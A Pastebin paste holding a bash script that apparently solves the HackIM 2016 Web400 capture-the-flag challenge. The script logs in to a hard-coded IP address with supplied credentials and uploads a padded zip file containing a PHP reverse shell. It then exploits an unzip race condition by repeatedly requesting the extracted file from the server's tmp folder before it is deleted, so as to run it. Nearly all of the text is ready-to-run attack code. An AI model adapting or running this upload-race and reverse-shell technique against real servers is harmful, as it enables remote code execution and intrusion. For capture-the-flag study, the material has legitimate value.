Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #
- # HackIM 2016 / Web400: smashthestate
- #
- # get reverse shell
- #
- cat > result.html <<EOF
- <title>404 Not Found</title>
- EOF
- # create zip + payload
- dd if=/dev/zero of=random.data bs=1k count=10000
- # php reverse shell (e.g.: http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
- cp rev.php a.php
- zip a.zip random.data a.php
- # login
- PHPSESSID=`curl -s -X POST "http://54.152.101.3/?page=login" -d "user=rob&pass=smashthestate" -c - | tail -1 | awk '{ print $7 }'`
- echo -n $PHPSESSID
- # try race condition until success
- while cat result.html | grep "<title>404 Not Found</title>" > /dev/null; do
- echo -n .
- # upload zip
- curl -s -X POST "http://54.152.101.3/?page=process_upload" -F "zipfile=@a.zip" -b "PHPSESSID=$PHPSESSID" > /dev/null &
- # exploit race condition by quickly opening a.php in tmp folder after unzip
- sleep 1
- curl -s -X GET "http://54.152.101.3/tmp/upload_${PHPSESSID}/a.php" > result.html
- done
- cat result.html
- exit 0
Add Comment
Please, Sign In to add comment